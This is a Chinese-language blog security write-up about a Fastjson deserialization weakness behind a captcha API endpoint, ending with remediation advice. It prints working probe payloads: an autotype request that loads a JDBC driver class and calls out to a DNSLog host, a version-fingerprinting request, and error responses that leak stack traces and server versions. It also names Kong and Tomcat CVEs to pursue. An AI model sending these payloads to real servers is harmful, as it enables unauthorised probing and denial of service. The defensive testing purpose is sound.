首页 > 其他分享 >FastJson引入存在DDos攻击安全漏洞案例分析

FastJson引入存在DDos攻击安全漏洞案例分析

时间:2024-08-19 13:28:36浏览次数:10  
标签:FastJson web java springframework DDos 安全漏洞 org servlet method

FastJson引入存在DDos攻击安全漏洞案例分析

image

背景

    某集团公司门户网站接口存在DDos攻击安全漏洞,其他服务端工程中依赖Fastjson进行序列化。Fastjson是阿里巴巴开发的一款高性能的Java JSON处理库。本身在处理JSON数据时可能存在安全性问题,如JSON注入攻击。DDoS攻击是指攻击者通过控制大量网络设备(如个人电脑、服务器、物联网设备等),向目标网站或服务器发送海量的、并非出于正常业务需要的访问请求,以耗尽目标系统或网站的资源,导致用户无法正常使用该系统或访问该网站,从而达到破坏网站或在线服务正常运营的目的。

原理

     利用Fastjson的某些漏洞(如反序列化漏洞)来构造攻击载荷,从而可能间接导致目标系统资源耗尽,形成类似DDoS的效果。

过程

    我们看到如下模拟测试HTTP接口请求,响应时间分别是14.3秒与10秒, 攻击者可以基于这个慢响应时间发起对服务器进行DDos攻击

image


HTTP请求与响应报文

详细HTTP请求与响应报文报文如下:

POST https://xxxx/ws/isCaptcha

HTTP/1.1

Host: xxxx

Content-Length: 70

Accept: application/json

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36

Content-Type: application/json

{"@type":"java.net.InetSocketAddress"{"address":,"val":"xxxx"}}


HTTP/1.1 500

Content-Type: text/html;charset=utf-8

Content-Length: 7812

Connection: keep-alive

vary: accept-encoding

Content-Language: en

Date: Sat, 30 Mar 2024 07:12:30 GMT

X-Kong-Upstream-Latency: 7

X-Kong-Proxy-Latency: 1

Via: kong/0.14.0

<!doctype html><html lang="en"><head><title>HTTP Status 500 – Internal Server Error</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 500 – Internal Server Error</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Request processing failed; nested exception is com.alibaba.fastjson.JSONException: java.net.InetSocketAddress cannot be cast to java.util.Map</p><p><b>Description</b> The server encountered an unexpected condition that prevented it from fulfilling the request.</p><p><b>Exception</b></p><pre>org.springframework.web.util.NestedServletException: Request processing failed; nested exception is com.alibaba.fastjson.JSONException: java.net.InetSocketAddress cannot be cast to java.util.Map

org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:965)

org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:855)

javax.servlet.http.HttpServlet.service(HttpServlet.java:652)

org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:829)

javax.servlet.http.HttpServlet.service(HttpServlet.java:733)

org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)

filter.AccessFilters.doFilter(AccessFilters.java:74)

org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)

org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:106)

</pre><p><b>Root Cause</b></p><pre>com.alibaba.fastjson.JSONException: java.net.InetSocketAddress cannot be cast to java.util.Map

com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:710)

com.alibaba.fastjson.JSON.parseObject(JSON.java:394)

com.alibaba.fastjson.JSON.parseObject(JSON.java:362)

com.alibaba.fastjson.JSON.parseObject(JSON.java:325)

com.xxxx.c2.web.converter.FastJsonMessageConverter.read(FastJsonMessageConverter.java:93)

org.springframework.web.servlet.mvc.method.annotation.AbstractMessageConverterMethodArgumentResolver.readWithMessageConverters(AbstractMessageConverterMethodArgumentResolver.java:143)

org.springframework.web.servlet.mvc.method.annotation.RequestResponseBodyMethodProcessor.readWithMessageConverters(RequestResponseBodyMethodProcessor.java:180)

org.springframework.web.servlet.mvc.method.annotation.RequestResponseBodyMethodProcessor.resolveArgument(RequestResponseBodyMethodProcessor.java:95)

org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:77)

org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:157)

org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:124)

org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:104)

org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandleMethod(RequestMappingHandlerAdapter.java:745)

org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:685)

org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:80)

org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:919)

org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:851)

org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:953)

org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:855)

javax.servlet.http.HttpServlet.service(HttpServlet.java:652)

org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:829)

javax.servlet.http.HttpServlet.service(HttpServlet.java:733)

org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)

filter.AccessFilters.doFilter(AccessFilters.java:74)

org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)

org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:106)

</pre><p><b>Root Cause</b></p><pre>java.lang.ClassCastException: java.net.InetSocketAddress cannot be cast to java.util.Map

com.alibaba.fastjson.parser.deserializer.MapDeserializer.parseMap(MapDeserializer.java:217)

com.alibaba.fastjson.parser.deserializer.MapDeserializer.deserialze(MapDeserializer.java:69)

com.alibaba.fastjson.parser.deserializer.MapDeserializer.deserialze(MapDeserializer.java:43)

com.alibaba.fastjson.parser.deserializer.ContextObjectDeserializer.deserialze(ContextObjectDeserializer.java:9)

com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:705)

com.alibaba.fastjson.JSON.parseObject(JSON.java:394)

com.alibaba.fastjson.JSON.parseObject(JSON.java:362)

com.alibaba.fastjson.JSON.parseObject(JSON.java:325)

com.xxxx.c2.web.converter.FastJsonMessageConverter.read(FastJsonMessageConverter.java:93)

org.springframework.web.servlet.mvc.method.annotation.AbstractMessageConverterMethodArgumentResolver.readWithMessageConverters(AbstractMessageConverterMethodArgumentResolver.java:143)

org.springframework.web.servlet.mvc.method.annotation.RequestResponseBodyMethodProcessor.readWithMessageConverters(RequestResponseBodyMethodProcessor.java:180)

org.springframework.web.servlet.mvc.method.annotation.RequestResponseBodyMethodProcessor.resolveArgument(RequestResponseBodyMethodProcessor.java:95)

org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:77)

org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:157)

org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:124)

org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:104)

org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandleMethod(RequestMappingHandlerAdapter.java:745)

org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:685)

org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:80)

org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:919)

org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:851)

org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:953)

org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:855)

javax.servlet.http.HttpServlet.service(HttpServlet.java:652)

org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:829)

javax.servlet.http.HttpServlet.service(HttpServlet.java:733)

org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)

filter.AccessFilters.doFilter(AccessFilters.java:74)

org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)

org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:106)

</pre><p><b>Note</b> The full stack trace of the root cause is available in the server logs.</p><hr class="line" /><h3>Apache Tomcat/8.5.65</h3></body></html>


报文分析

敏感信息泄露:

服务器响应中包含了异常的堆栈跟踪信息,这可能泄露了服务器的内部实现细节,攻击者可能利用这些信息进行进一步的攻击。

响应头中的Apache Tomcat/8.5.65表明服务器使用的是Tomcat 8.5版本,这个版本存在已知的安全漏洞,Tomcat 8.5.65存在安全漏洞分别是CVE-2023-45648,建议升级到最新的安全版本。

image

暴露网关Kong版本0.14.0

X-Kong-Upstream-Latency: <latency>:latency是Kong从 upstream service 接收到响应所等待的时间,单位为毫秒

通过ScanPort端口扫描,进一步获取其他开放端口情况

image

Kong未授权访问漏洞CVE-2020-11710

缺乏错误处理:
服务器在遇到错误时没有进行适当的错误处理,而是直接将异常信息返回给了客户端,这不仅对用户体验不好,也增加了安全风险。

缺乏输入验证:
从异常信息来看,服务器端在解析JSON时没有进行足够的输入验证,导致类型转换错误。这表明服务器端可能缺乏对输入数据的严格校验。

安全性配置不足:
服务器配置可能没有考虑到错误处理和信息泄露的问题,需要对服务器的错误响应进行配置,避免敏感信息泄露。


测试方法

Fastjson的autotype可能DDOS攻击漏洞,如HTTP接口响应时间 10-20秒, 则存在DDOS安全攻击风险

请求头

POST https://XXXX/ws/isCaptcha HTTP/1.1

Content-Length: 335

Accept: application/json

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36

Content-Type: application/json

请求体

{"@type":"java.net.Inet4Address","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type": "java.lang.String""@type":"java.util.Locale","language":{"@type":"java.lang.String"{1:{"@type":"java.lang.Class","val":"com.mysql.jdbc.Driver"}},"country":"aaa.qmc8xj4s.dnslog.pw"}}}


FastJson版本检测

如下示例,我们看到FastJson的1.2.83版本信息暴露

请求体:

POST http://xxx.cn/ws/isCaptcha
HTTP/1.1
Content-Length: 41
Content-Type: application/json

{
   "@type": "java.lang.AutoCloseable"


响应:

HTTP/1.1 500
Content-Type: application/json
Connection: keep-alive
Date: Thu, 02 May 2024 03:20:02 GMT
X-Kong-Upstream-Latency: 5
X-Kong-Proxy-Latency: 0
Via: kong/2.0.1
Content-Length: 174

{"timestamp":1714620002102,"status":500,"error":"Internal Server Error","message":"syntax error, expect {, actual EOF, pos 0, fastjson-version 1.2.83","path":"/ws/isCaptcha"}


解决方案

及时升级Fastjson版本
密切关注Fastjson官方发布的安全公告和更新信息,及时将Fastjson库升级到最新版本。新版本通常会修复已知的安全漏洞,提高系统的安全性。
输入验证:
对所有从外部接收的JSON数据进行严格的输入验证。只接受符合预期格式和内容的JSON数据,对包含恶意代码的输入进行过滤或拒绝处理。
审计和监控:
定期对系统进行安全审计和监控,以便及时发现和处理潜在的安全威胁。

使用安全的 JSON 库:
使用像 Jackson 或 Gson 这样的库,它们通常有更好的安全性特性,比如禁用特定的类或使用安全配置。

禁用不安全的反序列化

如果可能的话,完全避免使用不安全的反序列化技术。


结论

     本案例通过测试与验证发现接口响应时间慢导致DDos攻击安全漏洞,服务端又暴露组件FastJson,Spring,Tomcat等,其实质是Fastjson引入的问题,替换web层依赖Fastjson为Jackson序列化配置。可以短期內解决这个安全漏洞。


今天先到这儿,希望对云原生,技术领导力, 企业管理,系统架构设计与评估,团队管理, 项目管理, 产品管理,信息安全,团队建设 有参考作用 , 您可能感兴趣的文章:
构建创业公司突击小团队
国际化环境下系统架构演化
微服务架构设计
视频直播平台的系统架构演化
微服务与Docker介绍
Docker与CI持续集成/CD
互联网电商购物车架构演变案例
互联网业务场景下消息队列架构
互联网高效研发团队管理演进之一
消息系统架构设计演进
互联网电商搜索架构演化之一
企业信息化与软件工程的迷思
企业项目化管理介绍
软件项目成功之要素
人际沟通风格介绍一
精益IT组织与分享式领导
学习型组织与企业
企业创新文化与等级观念
组织目标与个人目标
初创公司人才招聘与管理
人才公司环境与企业文化
企业文化、团队文化与知识共享
高效能的团队建设
项目管理沟通计划
构建高效的研发与自动化运维
某大型电商云平台实践
互联网数据库架构设计思路
IT基础架构规划方案一(网络系统规划)
餐饮行业解决方案之客户分析流程
餐饮行业解决方案之采购战略制定与实施流程
餐饮行业解决方案之业务设计流程
供应链需求调研CheckList
企业应用之性能实时度量系统演变

如有想了解更多软件设计与架构, 系统IT,企业信息化, 团队管理 资讯,请关注我的微信订阅号:

image_thumb2_thumb_thumb_thumb_thumb[1]

作者:Petter Liu
出处:http://www.cnblogs.com/wintersun/
本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留追究法律责任的权利。 该文章也同时发布在我的独立博客中-Petter Liu Blog。

标签:FastJson,web,java,springframework,DDos,安全漏洞,org,servlet,method
From: https://www.cnblogs.com/wintersun/p/18367118

相关文章

  • 放弃fastjson拥抱jackson
    放弃fastjson拥抱jackson背景功能强大好用;不亏是国人更懂国人;但是安全漏洞频发;生产项目总是告警勒令修改放弃使用。坑爹玩意fastjson漏洞太多直接搞了fastjson2;虽然大部分兼容远古项目还需要升级谁敢动呀。动了引发一些未知BUG那岂不是背锅侠(玩笑该干还得干挣得就是......
  • 常见DDoS攻击之Fraggle Attack
    一、什么是FraggleAttackFraggle攻击是一种基于UDP协议的网络攻击手段,它通过发送大量伪造的UDP数据包到目标服务器,导致服务器无法正常处理合法用户的请求,实现拒绝服务(DoS)攻击的目的。这种攻击最早由美国安全研究人员发现,其主要特点包括伪造源IP地址、使用随机端口号,并利用TCP......
  • 常见DDoS攻击之RST flood
    一、什么是RSTfloodRSTflood是一种网络攻击手段,属于TCP协议中的拒绝服务攻击(DoS)的一种形式。在这种攻击中,攻击者发送伪造的TCPRST(Reset)数据包到目标服务器,目的是迫使服务器关闭活跃的TCP连接,从而影响服务的正常运行。这种攻击通常用于中断网络服务,使得合法用户无法访问目......
  • Kali Linux 三种网络攻击方法总结(DDoS、CC 和 ARP 欺骗)
    一、引言在当今数字化的时代,网络安全成为了至关重要的议题。了解网络攻击的方法和原理不仅有助于我们增强防范意识,更是网络安全领域专业人员必备的知识。KaliLinux作为一款专为网络安全专业人员和爱好者设计的操作系统,提供了丰富的工具来模拟和研究各种网络攻击手段。本文......
  • 第17天 信息打点-语言框架&开发组件&FastJson&Shiro&Log4j&SpringBoot等
    时间轴演示案例指纹识别—本地工具—GotoScanPython—开发框架—Django&FlaskPHP—开发框架—ThinkPHP&Laravel&YiiJava—框架组件—FastJson&Shiro&Solr&Spring知识点1.CMS指纹识别—不出网程序识别解决:CMS识别到后前期漏洞利用和代码审计一般PHP开发居多,利用源码......
  • com.alibaba.fastjson 将object装jsonObject两次字段顺序会出现不一致
    Objectentity=params.get("entity");JSONObjectjsonObject=(JSONObject)JSONObject.toJSON(entity);//遍历JSONObjectfor(Map.Entry<String,Object>entry:jsonObject.entrySet())以上代码,在同一个object,两次经过的到时候,遍历J......
  • 为什么 DDoS 攻击偏爱使用 TCP 和 UDP 包?
    DistributedDenialofService(DDoS)攻击是指攻击者利用多个计算机系统或网络设备(通常是被恶意软件感染的计算机,被称为“僵尸网络”)来淹没目标服务器的资源,导致合法用户无法访问服务。TCP和UDP是两种最常见的用于DDoS攻击的网络协议。1.TCP和UDP的特性TCP(Tr......
  • fastjson反序列化漏洞原理及<=1.2.24&<=1.2.47&Fastjson v1.2.80简单利用&不出网判断&修
    1、什么是fastjsonfastjson是一个有阿里开发的一个开源Java类库,可以将Java对象转换为JSON格式(序列化),当然它也可以将JSON字符串转换为Java对象(反序列化)。2、漏洞原理FastJson在解析json的过程中,⽀持使⽤autoType来实例化某⼀个具体的类,并调⽤该类的set/get⽅法......
  • DDoS 攻击下的教育网站防护策略
    随着互联网的普及,教育网站成为学生和教师获取信息、进行在线学习的重要平台。然而,这些网站也成为了网络攻击的目标,尤其是分布式拒绝服务(DDoS)攻击。本文将探讨DDoS攻击对教育网站的影响,并提出一系列有效的防护措施,包括技术手段和管理策略,以确保教育网站的稳定运行。DDoS攻击......
  • 【nacos】记一次使用NacosExploitGUI扫描发现nacos安全漏洞
    一、场景   公司使用nacos作为配置和注册中心,使用的版本是1.4.0 二、下载NacosExploitGUIhttps://github.com/charonlight/NacosExploitGUI下载release中的压缩包  三、运行NacosExploitGUI1、运行$java-jarNacosExploitGUI_v4.0.jarError:JavaFXruntime......